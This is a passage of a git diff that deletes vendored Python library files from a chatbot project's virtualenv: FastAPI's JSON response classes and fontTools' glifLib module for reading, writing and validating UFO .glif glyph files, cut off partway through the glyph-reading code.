/dev/null @@ -1,34 +0,0 @@ -from typing import Any - -from starlette.responses import FileResponse as FileResponse # noqa -from starlette.responses import HTMLResponse as HTMLResponse # noqa -from starlette.responses import JSONResponse as JSONResponse # noqa -from starlette.responses import PlainTextResponse as PlainTextResponse # noqa -from starlette.responses import RedirectResponse as RedirectResponse # noqa -from starlette.responses import Response as Response # noqa -from starlette.responses import StreamingResponse as StreamingResponse # noqa - -try: - import ujson -except ImportError: # pragma: nocover - ujson = None # type: ignore - - -try: - import orjson -except ImportError: # pragma: nocover - orjson = None # type: ignore - - -class UJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert ujson is not None, "ujson must be installed to use UJSONResponse" - return ujson.dumps(content, ensure_ascii=False).encode("utf-8") - - -class ORJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert orjson is not None, "orjson must be installed to use ORJSONResponse" - return orjson.dumps( - content, option=orjson.OPT_NON_STR_KEYS | orjson.OPT_SERIALIZE_NUMPY - ) diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ufoLib/glifLib.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ufoLib/glifLib.py deleted file mode 100644 index 6dee9db302f51525b69d3d28fcd704be8cce2212..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ufoLib/glifLib.py +++ /dev/null @@ -1,2017 +0,0 @@ -""" -glifLib.py -- Generic module for reading and writing the .glif format. - -More info about the .glif format (GLyphInterchangeFormat) can be found here: - - http://unifiedfontobject.org - -The main class in this module is GlyphSet. It manages a set of .glif files -in a folder. It offers two ways to read glyph data, and one way to write -glyph data. See the class doc string for details. 
-""" - -from __future__ import annotations - -import logging -import enum -from warnings import warn -from collections import OrderedDict -import fs -import fs.base -import fs.errors -import fs.osfs -import fs.path -from fontTools.misc.textTools import tobytes -from fontTools.misc import plistlib -from fontTools.pens.pointPen import AbstractPointPen, PointToSegmentPen -from fontTools.ufoLib.errors import GlifLibError -from fontTools.ufoLib.filenames import userNameToFileName -from fontTools.ufoLib.validators import ( - genericTypeValidator, - colorValidator, - guidelinesValidator, - anchorsValidator, - identifierValidator, - imageValidator, - glyphLibValidator, -) -from fontTools.misc import etree -from fontTools.ufoLib import _UFOBaseIO, UFOFormatVersion -from fontTools.ufoLib.utils import numberTypes, _VersionTupleEnumMixin - - -__all__ = [ - "GlyphSet", - "GlifLibError", - "readGlyphFromString", - "writeGlyphToString", - "glyphNameToFileName", -] - -logger = logging.getLogger(__name__) - - -# --------- -# Constants -# --------- - -CONTENTS_FILENAME = "contents.plist" -LAYERINFO_FILENAME = "layerinfo.plist" - - -class GLIFFormatVersion(tuple, _VersionTupleEnumMixin, enum.Enum): - FORMAT_1_0 = (1, 0) - FORMAT_2_0 = (2, 0) - - @classmethod - def default(cls, ufoFormatVersion=None): - if ufoFormatVersion is not None: - return max(cls.supported_versions(ufoFormatVersion)) - return super().default() - - @classmethod - def supported_versions(cls, ufoFormatVersion=None): - if ufoFormatVersion is None: - # if ufo format unspecified, return all the supported GLIF formats - return super().supported_versions() - # else only return the GLIF formats supported by the given UFO format - versions = {cls.FORMAT_1_0} - if ufoFormatVersion >= UFOFormatVersion.FORMAT_3_0: - versions.add(cls.FORMAT_2_0) - return frozenset(versions) - - -# workaround for py3.11, see https://github.com/fonttools/fonttools/pull/2655 -GLIFFormatVersion.__str__ = _VersionTupleEnumMixin.__str__ - - -# ------------ -# Simple Glyph -# ------------ - - -class Glyph: - - """ - Minimal glyph object. It has no glyph attributes until either - the draw() or the drawPoints() method has been called. - """ - - def __init__(self, glyphName, glyphSet): - self.glyphName = glyphName - self.glyphSet = glyphSet - - def draw(self, pen, outputImpliedClosingLine=False): - """ - Draw this glyph onto a *FontTools* Pen. - """ - pointPen = PointToSegmentPen( - pen, outputImpliedClosingLine=outputImpliedClosingLine - ) - self.drawPoints(pointPen) - - def drawPoints(self, pointPen): - """ - Draw this glyph onto a PointPen. - """ - self.glyphSet.readGlyph(self.glyphName, self, pointPen) - - -# --------- -# Glyph Set -# --------- - - -class GlyphSet(_UFOBaseIO): - - """ - GlyphSet manages a set of .glif files inside one directory. - - GlyphSet's constructor takes a path to an existing directory as it's - first argument. Reading glyph data can either be done through the - readGlyph() method, or by using GlyphSet's dictionary interface, where - the keys are glyph names and the values are (very) simple glyph objects. - - To write a glyph to the glyph set, you use the writeGlyph() method. - The simple glyph objects returned through the dict interface do not - support writing, they are just a convenient way to get at the glyph data. 
- """ - - glyphClass = Glyph - - def __init__( - self, - path, - glyphNameToFileNameFunc=None, - ufoFormatVersion=None, - validateRead=True, - validateWrite=True, - expectContentsFile=False, - ): - """ - 'path' should be a path (string) to an existing local directory, or - an instance of fs.base.FS class. - - The optional 'glyphNameToFileNameFunc' argument must be a callback - function that takes two arguments: a glyph name and a list of all - existing filenames (if any exist). It should return a file name - (including the .glif extension). The glyphNameToFileName function - is called whenever a file name is created for a given glyph name. - - ``validateRead`` will validate read operations. Its default is ``True``. - ``validateWrite`` will validate write operations. Its default is ``True``. - ``expectContentsFile`` will raise a GlifLibError if a contents.plist file is - not found on the glyph set file system. This should be set to ``True`` if you - are reading an existing UFO and ``False`` if you create a fresh glyph set. - """ - try: - ufoFormatVersion = UFOFormatVersion(ufoFormatVersion) - except ValueError as e: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat( - f"Unsupported UFO format: {ufoFormatVersion!r}" - ) from e - - if hasattr(path, "__fspath__"): # support os.PathLike objects - path = path.__fspath__() - - if isinstance(path, str): - try: - filesystem = fs.osfs.OSFS(path) - except fs.errors.CreateFailed: - raise GlifLibError("No glyphs directory '%s'" % path) - self._shouldClose = True - elif isinstance(path, fs.base.FS): - filesystem = path - try: - filesystem.check() - except fs.errors.FilesystemClosed: - raise GlifLibError("the filesystem '%s' is closed" % filesystem) - self._shouldClose = False - else: - raise TypeError( - "Expected a path string or fs object, found %s" % type(path).__name__ - ) - try: - path = filesystem.getsyspath("/") - except fs.errors.NoSysPath: - # network or in-memory FS may not map to the local one - path = str(filesystem) - # 'dirName' is kept for backward compatibility only, but it's DEPRECATED - # as it's not guaranteed that it maps to an existing OSFS directory. - # Client could use the FS api via the `self.fs` attribute instead. - self.dirName = fs.path.parts(path)[-1] - self.fs = filesystem - # if glyphSet contains no 'contents.plist', we consider it empty - self._havePreviousFile = filesystem.exists(CONTENTS_FILENAME) - if expectContentsFile and not self._havePreviousFile: - raise GlifLibError(f"{CONTENTS_FILENAME} is missing.") - # attribute kept for backward compatibility - self.ufoFormatVersion = ufoFormatVersion.major - self.ufoFormatVersionTuple = ufoFormatVersion - if glyphNameToFileNameFunc is None: - glyphNameToFileNameFunc = glyphNameToFileName - self.glyphNameToFileName = glyphNameToFileNameFunc - self._validateRead = validateRead - self._validateWrite = validateWrite - self._existingFileNames: set[str] | None = None - self._reverseContents = None - - self.rebuildContents() - - def rebuildContents(self, validateRead=None): - """ - Rebuild the contents dict by loading contents.plist. - - ``validateRead`` will validate the data, by default it is set to the - class's ``validateRead`` value, can be overridden. 
- """ - if validateRead is None: - validateRead = self._validateRead - contents = self._getPlist(CONTENTS_FILENAME, {}) - # validate the contents - if validateRead: - invalidFormat = False - if not isinstance(contents, dict): - invalidFormat = True - else: - for name, fileName in contents.items(): - if not isinstance(name, str): - invalidFormat = True - if not isinstance(fileName, str): - invalidFormat = True - elif not self.fs.exists(fileName): - raise GlifLibError( - "%s references a file that does not exist: %s" - % (CONTENTS_FILENAME, fileName) - ) - if invalidFormat: - raise GlifLibError("%s is not properly formatted" % CONTENTS_FILENAME) - self.contents = contents - self._existingFileNames = None - self._reverseContents = None - - def getReverseContents(self): - """ - Return a reversed dict of self.contents, mapping file names to - glyph names. This is primarily an aid for custom glyph name to file - name schemes that want to make sure they don't generate duplicate - file names. The file names are converted to lowercase so we can - reliably check for duplicates that only differ in case, which is - important for case-insensitive file systems. - """ - if self._reverseContents is None: - d = {} - for k, v in self.contents.items(): - d[v.lower()] = k - self._reverseContents = d - return self._reverseContents - - def writeContents(self): - """ - Write the contents.plist file out to disk. Call this method when - you're done writing glyphs. - """ - self._writePlist(CONTENTS_FILENAME, self.contents) - - # layer info - - def readLayerInfo(self, info, validateRead=None): - """ - ``validateRead`` will validate the data, by default it is set to the - class's ``validateRead`` value, can be overridden. - """ - if validateRead is None: - validateRead = self._validateRead - infoDict = self._getPlist(LAYERINFO_FILENAME, {}) - if validateRead: - if not isinstance(infoDict, dict): - raise GlifLibError("layerinfo.plist is not properly formatted.") - infoDict = validateLayerInfoVersion3Data(infoDict) - # populate the object - for attr, value in infoDict.items(): - try: - setattr(info, attr, value) - except AttributeError: - raise GlifLibError( - "The supplied layer info object does not support setting a necessary attribute (%s)." - % attr - ) - - def writeLayerInfo(self, info, validateWrite=None): - """ - ``validateWrite`` will validate the data, by default it is set to the - class's ``validateWrite`` value, can be overridden. - """ - if validateWrite is None: - validateWrite = self._validateWrite - if self.ufoFormatVersionTuple.major < 3: - raise GlifLibError( - "layerinfo.plist is not allowed in UFO %d." - % self.ufoFormatVersionTuple.major - ) - # gather data - infoData = {} - for attr in layerInfoVersion3ValueData.keys(): - if hasattr(info, attr): - try: - value = getattr(info, attr) - except AttributeError: - raise GlifLibError( - "The supplied info object does not support getting a necessary attribute (%s)." - % attr - ) - if value is None or (attr == "lib" and not value): - continue - infoData[attr] = value - if infoData: - # validate - if validateWrite: - infoData = validateLayerInfoVersion3Data(infoData) - # write file - self._writePlist(LAYERINFO_FILENAME, infoData) - elif self._havePreviousFile and self.fs.exists(LAYERINFO_FILENAME): - # data empty, remove existing file - self.fs.remove(LAYERINFO_FILENAME) - - def getGLIF(self, glyphName): - """ - Get the raw GLIF text for a given glyph name. This only works - for GLIF files that are already on disk. 
- - This method is useful in situations when the raw XML needs to be - read from a glyph set for a particular glyph before fully parsing - it into an object structure via the readGlyph method. - - Raises KeyError if 'glyphName' is not in contents.plist, or - GlifLibError if the file associated with can't be found. - """ - fileName = self.contents[glyphName] - try: - return self.fs.readbytes(fileName) - except fs.errors.ResourceNotFound: - raise GlifLibError( - "The file '%s' associated with glyph '%s' in contents.plist " - "does not exist on %s" % (fileName, glyphName, self.fs) - ) - - def getGLIFModificationTime(self, glyphName): - """ - Returns the modification time for the GLIF file with 'glyphName', as - a floating point number giving the number of seconds since the epoch. - Return None if the associated file does not exist or the underlying - filesystem does not support getting modified times. - Raises KeyError if the glyphName is not in contents.plist. - """ - fileName = self.contents[glyphName] - return self.getFileModificationTime(fileName) - - # reading/writing API - - def readGlyph(self, glyphName, glyphObject=None, pointPen=None, validate=None): - """ - Read a .glif file for 'glyphName' from the glyph set. The - 'glyphObject' argument can be any kind of object (even None); - the readGlyph() method will attempt to set the following - attributes on it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional, in two ways: - - 1) An attribute *won't* be set if the .glif file doesn't - contain data for it. 'glyphObject' will have to deal - with default values itself. - 2) If setting the attribute fails with an AttributeError - (for example if the 'glyphObject' attribute is read- - only), readGlyph() will not propagate that exception, - but ignore that attribute. - - To retrieve outline information, you need to pass an object - conforming to the PointPen protocol as the 'pointPen' argument. - This argument may be None if you don't need the outline data. - - readGlyph() will raise KeyError if the glyph is not present in - the glyph set. - - ``validate`` will validate the data, by default it is set to the - class's ``validateRead`` value, can be overridden. - """ - if validate is None: - validate = self._validateRead - text = self.getGLIF(glyphName) - try: - tree = _glifTreeFromString(text) - formatVersions = GLIFFormatVersion.supported_versions( - self.ufoFormatVersionTuple - ) - _readGlyphFromTree( - tree, - glyphObject, - pointPen, - formatVersions=formatVersions, - validate=validate, - ) - except GlifLibError as glifLibError: - # Re-raise with a note that gives extra context, describing where - # the error occurred. - fileName = self.contents[glyphName] - try: - glifLocation = f"'{self.fs.getsyspath(fileName)}'" - except fs.errors.NoSysPath: - # Network or in-memory FS may not map to a local path, so use - # the best string representation we have. - glifLocation = f"'{fileName}' from '{str(self.fs)}'" - - glifLibError._add_note( - f"The issue is in glyph '{glyphName}', located in {glifLocation}." 
- ) - raise - - def writeGlyph( - self, - glyphName, - glyphObject=None, - drawPointsFunc=None, - formatVersion=None, - validate=None, - ): - """ - Write a .glif file for 'glyphName' to the glyph set. The - 'glyphObject' argument can be any kind of object (even None); - the writeGlyph() method will attempt to get the following - attributes from it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional: if 'glyphObject' doesn't - have the attribute, it will simply be skipped. - - To write outline data to the .glif file, writeGlyph() needs - a function (any callable object actually) that will take one - argument: an object that conforms to the PointPen protocol. - The function will be called by writeGlyph(); it has to call the - proper PointPen methods to transfer the outline to the .glif file. - - The GLIF format version will be chosen based on the ufoFormatVersion - passed during the creation of this object. If a particular format - version is desired, it can be passed with the formatVersion argument. - The formatVersion argument accepts either a tuple of integers for - (major, minor), or a single integer for the major digit only (with - minor digit implied as 0). - - An UnsupportedGLIFFormat exception is raised if the requested GLIF - formatVersion is not supported. - - ``validate`` will validate the data, by default it is set to the - class's ``validateWrite`` value, can be overridden. - """ - if formatVersion is None: - formatVersion = GLIFFormatVersion.default(self.ufoFormatVersionTuple) - else: - try: - formatVersion = GLIFFormatVersion(formatVersion) - except ValueError as e: - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat( - f"Unsupported GLIF format version: {formatVersion!r}" - ) from e - if formatVersion not in GLIFFormatVersion.supported_versions( - self.ufoFormatVersionTuple - ): - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat( - f"Unsupported GLIF format version ({formatVersion!s}) " - f"for UFO format version {self.ufoFormatVersionTuple!s}." - ) - if validate is None: - validate = self._validateWrite - fileName = self.contents.get(glyphName) - if fileName is None: - if self._existingFileNames is None: - self._existingFileNames = { - fileName.lower() for fileName in self.contents.values() - } - fileName = self.glyphNameToFileName(glyphName, self._existingFileNames) - self.contents[glyphName] = fileName - self._existingFileNames.add(fileName.lower()) - if self._reverseContents is not None: - self._reverseContents[fileName.lower()] = glyphName - data = _writeGlyphToBytes( - glyphName, - glyphObject, - drawPointsFunc, - formatVersion=formatVersion, - validate=validate, - ) - if ( - self._havePreviousFile - and self.fs.exists(fileName) - and data == self.fs.readbytes(fileName) - ): - return - self.fs.writebytes(fileName, data) - - def deleteGlyph(self, glyphName): - """Permanently delete the glyph from the glyph set on disk. Will - raise KeyError if the glyph is not present in the glyph set. 
- """ - fileName = self.contents[glyphName] - self.fs.remove(fileName) - if self._existingFileNames is not None: - self._existingFileNames.remove(fileName.lower()) - if self._reverseContents is not None: - del self._reverseContents[fileName.lower()] - del self.contents[glyphName] - - # dict-like support - - def keys(self): - return list(self.contents.keys()) - - def has_key(self, glyphName): - return glyphName in self.contents - - __contains__ = has_key - - def __len__(self): - return len(self.contents) - - def __getitem__(self, glyphName): - if glyphName not in self.contents: - raise KeyError(glyphName) - return self.glyphClass(glyphName, self) - - # quickly fetch unicode values - - def getUnicodes(self, glyphNames=None): - """ - Return a dictionary that maps glyph names to lists containing - the unicode value[s] for that glyph, if any. This parses the .glif - files partially, so it is a lot faster than parsing all files completely. - By default this checks all glyphs, but a subset can be passed with glyphNames. - """ - unicodes = {} - if glyphNames is None: - glyphNames = self.contents.keys() - for glyphName in glyphNames: - text = self.getGLIF(glyphName) - unicodes[glyphName] = _fetchUnicodes(text) - return unicodes - - def getComponentReferences(self, glyphNames=None): - """ - Return a dictionary that maps glyph names to lists containing the - base glyph name of components in the glyph. This parses the .glif - files partially, so it is a lot faster than parsing all files completely. - By default this checks all glyphs, but a subset can be passed with glyphNames. - """ - components = {} - if glyphNames is None: - glyphNames = self.contents.keys() - for glyphName in glyphNames: - text = self.getGLIF(glyphName) - components[glyphName] = _fetchComponentBases(text) - return components - - def getImageReferences(self, glyphNames=None): - """ - Return a dictionary that maps glyph names to the file name of the image - referenced by the glyph. This parses the .glif files partially, so it is a - lot faster than parsing all files completely. - By default this checks all glyphs, but a subset can be passed with glyphNames. - """ - images = {} - if glyphNames is None: - glyphNames = self.contents.keys() - for glyphName in glyphNames: - text = self.getGLIF(glyphName) - images[glyphName] = _fetchImageFileName(text) - return images - - def close(self): - if self._shouldClose: - self.fs.close() - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_value, exc_tb): - self.close() - - -# ----------------------- -# Glyph Name to File Name -# ----------------------- - - -def glyphNameToFileName(glyphName, existingFileNames): - """ - Wrapper around the userNameToFileName function in filenames.py - - Note that existingFileNames should be a set for large glyphsets - or performance will suffer. - """ - if existingFileNames is None: - existingFileNames = set() - return userNameToFileName(glyphName, existing=existingFileNames, suffix=".glif") - - -# ----------------------- -# GLIF To and From String -# ----------------------- - - -def readGlyphFromString( - aString, - glyphObject=None, - pointPen=None, - formatVersions=None, - validate=True, -): - """ - Read .glif data from a string into a glyph object. 
- - The 'glyphObject' argument can be any kind of object (even None); - the readGlyphFromString() method will attempt to set the following - attributes on it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional, in two ways: - - 1) An attribute *won't* be set if the .glif file doesn't - contain data for it. 'glyphObject' will have to deal - with default values itself. - 2) If setting the attribute fails with an AttributeError - (for example if the 'glyphObject' attribute is read- - only), readGlyphFromString() will not propagate that - exception, but ignore that attribute. - - To retrieve outline information, you need to pass an object - conforming to the PointPen protocol as the 'pointPen' argument. - This argument may be None if you don't need the outline data. - - The formatVersions optional argument define the GLIF format versions - that are allowed to be read. - The type is Optional[Iterable[Tuple[int, int], int]]. It can contain - either integers (for the major versions to be allowed, with minor - digits defaulting to 0), or tuples of integers to specify both - (major, minor) versions. - By default when formatVersions is None all the GLIF format versions - currently defined are allowed to be read. - - ``validate`` will validate the read data. It is set to ``True`` by default. - """ - tree = _glifTreeFromString(aString) - - if formatVersions is None: - validFormatVersions = GLIFFormatVersion.supported_versions() - else: - validFormatVersions, invalidFormatVersions = set(), set() - for v in formatVersions: - try: - formatVersion = GLIFFormatVersion(v) - except ValueError: - invalidFormatVersions.add(v) - else: - validFormatVersions.add(formatVersion) - if not validFormatVersions: - raise ValueError( - "None of the requested GLIF formatVersions are supported: " - f"{formatVersions!r}" - ) - - _readGlyphFromTree( - tree, - glyphObject, - pointPen, - formatVersions=validFormatVersions, - validate=validate, - ) - - -def _writeGlyphToBytes( - glyphName, - glyphObject=None, - drawPointsFunc=None, - writer=None, - formatVersion=None, - validate=True, -): - """Return .glif data for a glyph as a UTF-8 encoded bytes string.""" - try: - formatVersion = GLIFFormatVersion(formatVersion) - except ValueError: - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat( - "Unsupported GLIF format version: {formatVersion!r}" - ) - # start - if validate and not isinstance(glyphName, str): - raise GlifLibError("The glyph name is not properly formatted.") - if validate and len(glyphName) == 0: - raise GlifLibError("The glyph name is empty.") - glyphAttrs = OrderedDict( - [("name", glyphName), ("format", repr(formatVersion.major))] - ) - if formatVersion.minor != 0: - glyphAttrs["formatMinor"] = repr(formatVersion.minor) - root = etree.Element("glyph", glyphAttrs) - identifiers = set() - # advance - _writeAdvance(glyphObject, root, validate) - # unicodes - if getattr(glyphObject, "unicodes", None): - _writeUnicodes(glyphObject, root, validate) - # note - if getattr(glyphObject, "note", None): - _writeNote(glyphObject, root, validate) - # image - if formatVersion.major >= 2 and getattr(glyphObject, "image", None): - _writeImage(glyphObject, root, validate) 
- # guidelines - if formatVersion.major >= 2 and getattr(glyphObject, "guidelines", None): - _writeGuidelines(glyphObject, root, identifiers, validate) - # anchors - anchors = getattr(glyphObject, "anchors", None) - if formatVersion.major >= 2 and anchors: - _writeAnchors(glyphObject, root, identifiers, validate) - # outline - if drawPointsFunc is not None: - outline = etree.SubElement(root, "outline") - pen = GLIFPointPen(outline, identifiers=identifiers, validate=validate) - drawPointsFunc(pen) - if formatVersion.major == 1 and anchors: - _writeAnchorsFormat1(pen, anchors, validate) - # prevent lxml from writing self-closing tags - if not len(outline): - outline.text = "\n " - # lib - if getattr(glyphObject, "lib", None): - _writeLib(glyphObject, root, validate) - # return the text - data = etree.tostring( - root, encoding="UTF-8", xml_declaration=True, pretty_print=True - ) - return data - - -def writeGlyphToString( - glyphName, - glyphObject=None, - drawPointsFunc=None, - formatVersion=None, - validate=True, -): - """ - Return .glif data for a glyph as a string. The XML declaration's - encoding is always set to "UTF-8". - The 'glyphObject' argument can be any kind of object (even None); - the writeGlyphToString() method will attempt to get the following - attributes from it: - - width - the advance width of the glyph - height - the advance height of the glyph - unicodes - a list of unicode values for this glyph - note - a string - lib - a dictionary containing custom data - image - a dictionary containing image data - guidelines - a list of guideline data dictionaries - anchors - a list of anchor data dictionaries - - All attributes are optional: if 'glyphObject' doesn't - have the attribute, it will simply be skipped. - - To write outline data to the .glif file, writeGlyphToString() needs - a function (any callable object actually) that will take one - argument: an object that conforms to the PointPen protocol. - The function will be called by writeGlyphToString(); it has to call the - proper PointPen methods to transfer the outline to the .glif file. - - The GLIF format version can be specified with the formatVersion argument. - This accepts either a tuple of integers for (major, minor), or a single - integer for the major digit only (with minor digit implied as 0). - By default when formatVesion is None the latest GLIF format version will - be used; currently it's 2.0, which is equivalent to formatVersion=(2, 0). - - An UnsupportedGLIFFormat exception is raised if the requested UFO - formatVersion is not supported. - - ``validate`` will validate the written data. It is set to ``True`` by default. 
- """ - data = _writeGlyphToBytes( - glyphName, - glyphObject=glyphObject, - drawPointsFunc=drawPointsFunc, - formatVersion=formatVersion, - validate=validate, - ) - return data.decode("utf-8") - - -def _writeAdvance(glyphObject, element, validate): - width = getattr(glyphObject, "width", None) - if width is not None: - if validate and not isinstance(width, numberTypes): - raise GlifLibError("width attribute must be int or float") - if width == 0: - width = None - height = getattr(glyphObject, "height", None) - if height is not None: - if validate and not isinstance(height, numberTypes): - raise GlifLibError("height attribute must be int or float") - if height == 0: - height = None - if width is not None and height is not None: - etree.SubElement( - element, - "advance", - OrderedDict([("height", repr(height)), ("width", repr(width))]), - ) - elif width is not None: - etree.SubElement(element, "advance", dict(width=repr(width))) - elif height is not None: - etree.SubElement(element, "advance", dict(height=repr(height))) - - -def _writeUnicodes(glyphObject, element, validate): - unicodes = getattr(glyphObject, "unicodes", None) - if validate and isinstance(unicodes, int): - unicodes = [unicodes] - seen = set() - for code in unicodes: - if validate and not isinstance(code, int): - raise GlifLibError("unicode values must be int") - if code in seen: - continue - seen.add(code) - hexCode = "%04X" % code - etree.SubElement(element, "unicode", dict(hex=hexCode)) - - -def _writeNote(glyphObject, element, validate): - note = getattr(glyphObject, "note", None) - if validate and not isinstance(note, str): - raise GlifLibError("note attribute must be str") - note = note.strip() - note = "\n" + note + "\n" - etree.SubElement(element, "note").text = note - - -def _writeImage(glyphObject, element, validate): - image = getattr(glyphObject, "image", None) - if validate and not imageValidator(image): - raise GlifLibError( - "image attribute must be a dict or dict-like object with the proper structure." 
- ) - attrs = OrderedDict([("fileName", image["fileName"])]) - for attr, default in _transformationInfo: - value = image.get(attr, default) - if value != default: - attrs[attr] = repr(value) - color = image.get("color") - if color is not None: - attrs["color"] = color - etree.SubElement(element, "image", attrs) - - -def _writeGuidelines(glyphObject, element, identifiers, validate): - guidelines = getattr(glyphObject, "guidelines", []) - if validate and not guidelinesValidator(guidelines): - raise GlifLibError("guidelines attribute does not have the proper structure.") - for guideline in guidelines: - attrs = OrderedDict() - x = guideline.get("x") - if x is not None: - attrs["x"] = repr(x) - y = guideline.get("y") - if y is not None: - attrs["y"] = repr(y) - angle = guideline.get("angle") - if angle is not None: - attrs["angle"] = repr(angle) - name = guideline.get("name") - if name is not None: - attrs["name"] = name - color = guideline.get("color") - if color is not None: - attrs["color"] = color - identifier = guideline.get("identifier") - if identifier is not None: - if validate and identifier in identifiers: - raise GlifLibError("identifier used more than once: %s" % identifier) - attrs["identifier"] = identifier - identifiers.add(identifier) - etree.SubElement(element, "guideline", attrs) - - -def _writeAnchorsFormat1(pen, anchors, validate): - if validate and not anchorsValidator(anchors): - raise GlifLibError("anchors attribute does not have the proper structure.") - for anchor in anchors: - attrs = {} - x = anchor["x"] - attrs["x"] = repr(x) - y = anchor["y"] - attrs["y"] = repr(y) - name = anchor.get("name") - if name is not None: - attrs["name"] = name - pen.beginPath() - pen.addPoint((x, y), segmentType="move", name=name) - pen.endPath() - - -def _writeAnchors(glyphObject, element, identifiers, validate): - anchors = getattr(glyphObject, "anchors", []) - if validate and not anchorsValidator(anchors): - raise GlifLibError("anchors attribute does not have the proper structure.") - for anchor in anchors: - attrs = OrderedDict() - x = anchor["x"] - attrs["x"] = repr(x) - y = anchor["y"] - attrs["y"] = repr(y) - name = anchor.get("name") - if name is not None: - attrs["name"] = name - color = anchor.get("color") - if color is not None: - attrs["color"] = color - identifier = anchor.get("identifier") - if identifier is not None: - if validate and identifier in identifiers: - raise GlifLibError("identifier used more than once: %s" % identifier) - attrs["identifier"] = identifier - identifiers.add(identifier) - etree.SubElement(element, "anchor", attrs) - - -def _writeLib(glyphObject, element, validate): - lib = getattr(glyphObject, "lib", None) - if not lib: - # don't write empty lib - return - if validate: - valid, message = glyphLibValidator(lib) - if not valid: - raise GlifLibError(message) - if not isinstance(lib, dict): - lib = dict(lib) - # plist inside GLIF begins with 2 levels of indentation - e = plistlib.totree(lib, indent_level=2) - etree.SubElement(element, "lib").append(e) - - -# ----------------------- -# layerinfo.plist Support -# ----------------------- - -layerInfoVersion3ValueData = { - "color": dict(type=str, valueValidator=colorValidator), - "lib": dict(type=dict, valueValidator=genericTypeValidator), -} - - -def validateLayerInfoVersion3ValueForAttribute(attr, value): - """ - This performs very basic validation of the value for attribute - following the UFO 3 fontinfo.plist specification. 
The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the value - is of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - if attr not in layerInfoVersion3ValueData: - return False - dataValidationDict = layerInfoVersion3ValueData[attr] - valueType = dataValidationDict.get("type") - validator = dataValidationDict.get("valueValidator") - valueOptions = dataValidationDict.get("valueOptions") - # have specific options for the validator - if valueOptions is not None: - isValidValue = validator(value, valueOptions) - # no specific options - else: - if validator == genericTypeValidator: - isValidValue = validator(value, valueType) - else: - isValidValue = validator(value) - return isValidValue - - -def validateLayerInfoVersion3Data(infoData): - """ - This performs very basic validation of the value for infoData - following the UFO 3 layerinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the values - are of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - for attr, value in infoData.items(): - if attr not in layerInfoVersion3ValueData: - raise GlifLibError("Unknown attribute %s." % attr) - isValidValue = validateLayerInfoVersion3ValueForAttribute(attr, value) - if not isValidValue: - raise GlifLibError(f"Invalid value for attribute {attr} ({value!r}).") - return infoData - - -# ----------------- -# GLIF Tree Support -# ----------------- - - -def _glifTreeFromFile(aFile): - if etree._have_lxml: - tree = etree.parse(aFile, parser=etree.XMLParser(remove_comments=True)) - else: - tree = etree.parse(aFile) - root = tree.getroot() - if root.tag != "glyph": - raise GlifLibError("The GLIF is not properly formatted.") - if root.text and root.text.strip() != "": - raise GlifLibError("Invalid GLIF structure.") - return root - - -def _glifTreeFromString(aString): - data = tobytes(aString, encoding="utf-8") - try: - if etree._have_lxml: - root = etree.fromstring(data, parser=etree.XMLParser(remove_comments=True)) - else: - root = etree.fromstring(data) - except Exception as etree_exception: - raise GlifLibError("GLIF contains invalid XML.") from etree_exception - - if root.tag != "glyph": - raise GlifLibError("The GLIF is not properly formatted.") - if root.text and root.text.strip() != "": - raise GlifLibError("Invalid GLIF structure.") - return root - - -def _readGlyphFromTree( - tree, - glyphObject=None, - pointPen=None, - formatVersions=GLIFFormatVersion.supported_versions(), - validate=True, -): - # check the format version - formatVersionMajor = tree.get("format") - if validate and formatVersionMajor is None: - raise GlifLibError("Unspecified format version in GLIF.") - formatVersionMinor = tree.get("formatMinor", 0) - try: - formatVersion = GLIFFormatVersion( - (int(formatVersionMajor), int(formatVersionMinor)) - ) - except ValueError as e: - msg = "Unsupported GLIF format: %s.%s" % ( - formatVersionMajor, - formatVersionMinor, - ) - if validate: - from fontTools.ufoLib.errors import UnsupportedGLIFFormat - - raise UnsupportedGLIFFormat(msg) from e - # warn but continue using the latest supported format - formatVersion = GLIFFormatVersion.default() - logger.warning( - "%s. Assuming the latest supported version (%s). 
